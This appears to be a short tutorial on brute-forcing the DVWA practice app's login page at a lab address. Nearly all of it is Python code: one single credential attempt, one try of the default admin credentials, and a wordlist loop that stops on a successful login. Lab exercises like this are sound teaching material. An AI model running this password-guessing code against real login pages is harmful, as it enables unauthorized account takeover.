Guessing Login Information on Login Pages
Our target website: http://10.0.0.45/dvwa/login.php
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "dfdfddfd", "password": "1234", "Login": "submit"} response = requests.post(target_url, data = data_dict) print(response.content.decode())
Execute the Python Script.
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "admin", "password": "password", "Login": "submit"} response = requests.post(target_url, data = data_dict) print(response.content.decode())
#!/usr/bin/env python import requests target_url = "http://10.0.0.45/dvwa/login.php" data_dict = {"username": "admin", "password": "", "Login": "submit"} with open("password.list", "r") as wordlist_file: for line in wordlist_file: word = line.strip() data_dict["password"] = word response = requests.post(target_url, data=data_dict) if "Login failed" not in response.content.decode(): print("[+] Got the password --> " + word) exit() print("[+] Reached end of line.")
